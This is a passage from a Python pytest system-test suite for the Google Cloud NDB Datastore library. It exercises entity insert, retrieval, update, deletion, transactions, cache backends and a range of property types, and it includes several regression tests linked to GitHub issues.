assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entities_in_parallel_nested(ds_entity):
"""Regression test for #357.
https://github.com/googleapis/python-ndb/issues/357
"""
entity1_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity1_id, foo=42, bar="none")
entity2_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity2_id, foo=65, bar="naan")
entity3_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity3_id, foo=66, bar="route")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key1 = ndb.Key(KIND, entity1_id)
key2 = ndb.Key(KIND, entity2_id)
key3 = ndb.Key(KIND, entity3_id)
@ndb.tasklet
def get_two_entities():
entity1, (entity2, entity3) = yield (
key1.get_async(),
[key2.get_async(), key3.get_async()],
)
raise ndb.Return(entity1, entity2, entity3)
entity1, entity2, entity3 = get_two_entities().result()
assert isinstance(entity1, SomeKind)
assert entity1.foo == 42
assert entity1.bar == "none"
assert isinstance(entity2, SomeKind)
assert entity2.foo == 65
assert entity2.bar == "naan"
assert isinstance(entity3, SomeKind)
assert entity3.foo == 66
assert entity3.bar == "route"
@pytest.mark.usefixtures("client_context")
def test_insert_entity(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
# Make sure strings are stored as strings in datastore
ds_entity = ds_client.get(key._key)
assert ds_entity["bar"] == "none"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_stored_name_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
bar = ndb.StringProperty(name="notbar")
entity = SomeKind(foo="something", bar="or other")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "something"
assert retrieved.bar == "or other"
ds_entity = ds_client.get(key._key)
assert ds_entity["notbar"] == "or other"
@pytest.mark.usefixtures("client_context")
def test_insert_roundtrip_naive_datetime(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty()
entity = SomeKind(foo=datetime.datetime(2010, 5, 12, 2, 42))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 2, 42)
@pytest.mark.usefixtures("client_context")
def test_datetime_w_tzinfo(dispose_of, ds_client):
class timezone(datetime.tzinfo):
def __init__(self, offset):
self.offset = datetime.timedelta(hours=offset)
def utcoffset(self, dt):
return self.offset
def dst(self, dt):
return datetime.timedelta(0)
mytz = timezone(-4)
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(tzinfo=mytz)
bar = ndb.DateTimeProperty(tzinfo=mytz)
entity = SomeKind(
foo=datetime.datetime(2010, 5, 12, 2, 42, tzinfo=timezone(-5)),
bar=datetime.datetime(2010, 5, 12, 2, 42),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2010, 5, 12, 3, 42, tzinfo=mytz)
assert retrieved.bar == datetime.datetime(2010, 5, 11, 22, 42, tzinfo=mytz)
def test_parallel_threads(dispose_of, namespace):
client = ndb.Client(namespace=namespace)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def insert(foo):
with client.context(cache_policy=False):
entity = SomeKind(foo=foo, bar="none")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == "none"
thread1 = threading.Thread(target=insert, args=[42], name="one")
thread2 = threading.Thread(target=insert, args=[144], name="two")
thread1.start()
thread2.start()
thread1.join()
thread2.join()
@pytest.mark.usefixtures("client_context")
def test_large_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_json_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.JsonProperty(compressed=True)
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_blob_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.BlobProperty(compressed=True)
foo = b"abc" * 100
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_compressed_repeated_local_structured_property(dispose_of, ds_client):
class Dog(ndb.Model):
name = ndb.StringProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.dogs == dogs
def test_get_by_id_with_compressed_repeated_local_structured_property(
client_context, dispose_of, ds_client
):
class Dog(ndb.Model):
name = ndb.TextProperty()
class House(ndb.Model):
dogs = ndb.LocalStructuredProperty(Dog, repeated=True, compressed=True)
with client_context.new(legacy_data=True).use():
entity = House()
dogs = [Dog(name="Mika"), Dog(name="Mocha")]
entity.dogs = dogs
key = entity.put()
house_id = key.id()
dispose_of(key._key)
retrieved = House.get_by_id(house_id)
assert retrieved.dogs == dogs
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_compressed_property(
ds_entity_with_meanings,
):
class SomeKind(ndb.Model):
blob = ndb.BlobProperty()
value = b"abc" * 1000
compressed_value = zlib.compress(value)
entity_id = test_utils.system.unique_resource_id()
ds_entity_with_meanings(
{"blob": (22, compressed_value)}, KIND, entity_id, **{"blob": compressed_value}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.blob == value
@pytest.mark.usefixtures("client_context")
def test_large_pickle_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.PickleProperty()
foo = {str(i): i for i in range(500)}
entity = SomeKind(foo=foo)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
@pytest.mark.usefixtures("client_context")
def test_key_property(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty()
key_value = ndb.Key("Whatevs", 123)
entity = SomeKind(foo=key_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == key_value
@pytest.mark.usefixtures("client_context")
def test_multiple_key_properties(dispose_of, ds_client):
class SomeKind(ndb.Model):
foo = ndb.KeyProperty(kind="Whatevs")
bar = ndb.KeyProperty(kind="Whatevs")
foo = ndb.Key("Whatevs", 123)
bar = ndb.Key("Whatevs", 321)
entity = SomeKind(foo=foo, bar=bar)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == foo
assert retrieved.bar == bar
assert retrieved.foo != retrieved.bar
def test_insert_entity_with_caching(client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
with client_context.new(cache_policy=False).use():
        # Sneaky. Delete entity out from under cache so we know we're getting
        # the cached copy.
key.delete()
eventually(key.get, equals(None))
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
def test_insert_entity_with_global_cache(dispose_of, client_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
cache_value = global_cache.get([cache_key])[0]
assert not cache_value
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
cache_value = global_cache.get([cache_key])[0]
assert cache_value
assert not _cache.is_locked_value(cache_value)
entity.foo = 43
entity.put()
cache_value = global_cache.get([cache_key])[0]
assert not cache_value
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_insert_entity_with_redis_cache(dispose_of, redis_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
cache_value = redis_context.global_cache.redis.get(cache_key)
assert not cache_value
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
cache_value = redis_context.global_cache.redis.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
entity.foo = 43
entity.put()
cache_value = redis_context.global_cache.redis.get(cache_key)
assert not cache_value
@pytest.mark.skipif(not USE_MEMCACHE, reason="Memcache is not configured")
def test_insert_entity_with_memcache(dispose_of, memcache_context):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
cache_key = global_cache_module.MemcacheCache._key(cache_key)
cache_value = memcache_context.global_cache.client.get(cache_key)
assert not cache_value
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
cache_value = memcache_context.global_cache.client.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
entity.foo = 43
entity.put()
cache_value = memcache_context.global_cache.client.get(cache_key)
assert not cache_value
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
cache_value = global_cache.get([cache_key])[0]
assert cache_value
assert not _cache.is_locked_value(cache_value)
assert key.delete() is None
cache_value = global_cache.get([cache_key])[0]
assert not cache_value
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
cache_value = global_cache.get([cache_key])[0]
assert _cache.is_locked_value(cache_value)
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
assert key.get().foo == 42
cache_value = redis_context.global_cache.redis.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
assert key.delete() is None
cache_value = redis_context.global_cache.redis.get(cache_key)
assert not cache_value
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
cache_value = redis_context.global_cache.redis.get(cache_key)
assert _cache.is_locked_value(cache_value)
@pytest.mark.skipif(not USE_MEMCACHE, reason="Memcache is not configured")
def test_delete_entity_with_memcache(ds_entity, memcache_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
cache_key = global_cache_module.MemcacheCache._key(cache_key)
assert key.get().foo == 42
cache_value = memcache_context.global_cache.client.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
assert key.delete() is None
cache_value = memcache_context.global_cache.client.get(cache_key)
assert not cache_value
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
cache_value = memcache_context.global_cache.client.get(cache_key)
assert _cache.is_locked_value(cache_value)
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
def test_delete_entity_in_transaction_with_global_cache(client_context, ds_entity):
"""Regression test for #426
https://github.com/googleapis/python-ndb/issues/426
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use():
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
ndb.transaction(key.delete)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_in_transaction(dispose_of):
"""Regression test for #433
https://github.com/googleapis/python-ndb/issues/433
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
@ndb.transactional()
def do_the_thing(foo):
entity = SomeKind.get_or_insert(name, foo=foo)
return entity
entity = do_the_thing(42)
dispose_of(entity._key._key)
assert entity.foo == 42
entity = do_the_thing(21)
assert entity.foo == 42
def test_get_by_id_default_namespace_when_context_namespace_is_other(
client_context, dispose_of, other_namespace
):
"""Regression test for #535.
https://github.com/googleapis/python-ndb/issues/535
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity1 = SomeKind(foo=1, id="x", namespace="")
entity1.put()
dispose_of(entity1.key._key)
with client_context.new(namespace=other_namespace).use():
result = SomeKind.get_by_id("x", namespace="")
assert result is not None
assert result.foo == 1
def test_get_or_insert_default_namespace_when_context_namespace_is_other(
client_context, dispose_of, other_namespace
):
"""Regression test for #535.
https://github.com/googleapis/python-ndb/issues/535
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
with client_context.new(namespace=other_namespace).use():
SomeKind.get_or_insert("x", namespace="", foo=1)
result = SomeKind.get_by_id("x", namespace="")
assert result is not None
assert result.foo == 1
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"})
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_legacy_repeated_structured_property_w_expando(
ds_client, dispose_of, client_context
):
"""Regression test for #669
https://github.com/googleapis/python-ndb/issues/669
"""
class OtherKind(ndb.Expando):
one = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity = SomeKind(
foo=42,
bar=[
OtherKind(one="one-a"),
OtherKind(two="two-b"),
OtherKind(one="one-c", two="two-c"),
],
)
with client_context.new(legacy_data=True).use():
key = entity.put()
dispose_of(key._key)
ds_entity = ds_client.get(key._key)
assert ds_entity["bar.one"] == ["one-a", None, "one-c"]
assert ds_entity["bar.two"] == [None, "two-b", "two-c"]
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "one-a"
assert not hasattr(retrieved.bar[0], "two")
assert retrieved.bar[1].one is None
assert retrieved.bar[1].two == "two-b"
assert retrieved.bar[2].one == "one-c"
assert retrieved.bar[2].two == "two-c"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
assert isinstance(retrieved.bar[2], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_legacy_repeated_structured_property_w_expando_empty(
ds_client, dispose_of, client_context
):
"""Regression test for #669
https://github.com/googleapis/python-ndb/issues/669
"""
class OtherKind(ndb.Expando):
one = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity = SomeKind(foo=42, bar=[])
with client_context.new(legacy_data=True).use():
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == []
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
def test_insert_expando_w_legacy_structured_property(client_context, dispose_of):
"""Regression test for issue #673
https://github.com/googleapis/python-ndb/issues/673
"""
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
class OtherKind(ndb.Expando):
bar = ndb.StringProperty()
with client_context.new(legacy_data=True).use():
entity = SomeKind(
foo=42,
other=OtherKind(
bar="hi mom!",
other=OtherKind(bar="hello dad!"),
),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.other.bar == "hi mom!"
# Note that the class for the subobject is lost. I tested with legacy NDB and
# this is true there as well.
assert isinstance(retrieved.other, ndb.Expando)
assert not isinstance(retrieved.other, OtherKind)
def test_insert_expando_w_legacy_dynamic_dict(client_context, dispose_of):
"""Regression test for issue #673
https://github.com/googleapis/python-ndb/issues/673
"""
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
with client_context.new(legacy_data=True).use():
dynamic_dict_value = {"k1": {"k2": {"k3": "v1"}}, "k4": "v2"}
entity = SomeKind(foo=42, dynamic_dict_prop=dynamic_dict_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.dynamic_dict_prop.k1.k2.k3 == "v1"
assert retrieved.dynamic_dict_prop.k4 == "v2"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property_with_tz(dispose_of):
"""Regression test for #517
https://github.com/googleapis/python-ndb/issues/517
"""
class SomeKind(ndb.Model):
created_at = ndb.DateTimeProperty(auto_now_add=True, tzinfo=pytz.utc)
updated_at = ndb.DateTimeProperty(auto_now=True, tzinfo=pytz.utc)
now = datetime.datetime.now(pytz.utc)
entity = SomeKind()
key = entity.put()
dispose_of(key._key)
_assert_contemporaneous(entity.created_at, now)
_assert_contemporaneous(entity.updated_at, now)
retrieved = key.get()
_assert_contemporaneous(retrieved.created_at, now)
_assert_contemporaneous(retrieved.updated_at, now)
@pytest.mark.usefixtures("client_context")
def test_insert_datetime_property_with_tz(dispose_of):
"""Regression test for #517
https://github.com/googleapis/python-ndb/issues/517
"""
class SomeKind(ndb.Model):
alarm1 = ndb.DateTimeProperty(tzinfo=pytz.utc)
alarm2 = ndb.DateTimeProperty(tzinfo=pytz.utc)
now = datetime.datetime.now(pytz.utc)
entity = SomeKind(
alarm1=now,
alarm2=datetime.datetime.utcnow(), # naive
)
key = entity.put()
dispose_of(key._key)
_assert_contemporaneous(entity.alarm1, now)
_assert_contemporaneous(entity.alarm2, now)
retrieved = key.get()
_assert_contemporaneous(retrieved.alarm1, now)
_assert_contemporaneous(retrieved.alarm2, now)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_computed_key_property(dispose_of):
"""Regression test for #284.
https://github.com/googleapis/python-ndb/issues/284
"""
class AModel(ndb.Model):
s_foo = ndb.StringProperty()
class BModel(ndb.Model):
s_bar = ndb.StringProperty()
key_a = ndb.KeyProperty(kind="AModel", indexed=True)
class CModel(ndb.Model):
s_foobar = ndb.StringProperty()
key_b = ndb.KeyProperty(kind="BModel", indexed=True)
key_a = ndb.ComputedProperty( # Issue here
lambda self: self.key_b.get().key_a if self.key_b else None,
)
key_a = AModel(s_foo="test").put()
dispose_of(key_a._key)
key_b = BModel(s_bar="test", key_a=key_a).put()
dispose_of(key_b._key)
key_c = CModel(s_foobar="test", key_b=key_b).put()
dispose_of(key_c._key)
entity = key_c.get()
assert entity.key_a == key_a
assert entity.key_b == key_b
@pytest.mark.usefixtures("client_context")
def test_user_property(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
user = ndb.User("somebody@example.com", "gmail.com")
entity = SomeKind(user=user)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.user.email() == "somebody@example.com"
assert retrieved.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_user_property_different_user_class(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
class User(object):
def email(self):
return "somebody@example.com"
def auth_domain(self):
return "gmail.com"
def user_id(self):
return None
entity = SomeKind(user=User())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.user.email() == "somebody@example.com"
assert retrieved.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_repeated_empty_strings(dispose_of):
"""Regression test for issue # 300.
https://github.com/googleapis/python-ndb/issues/300
"""
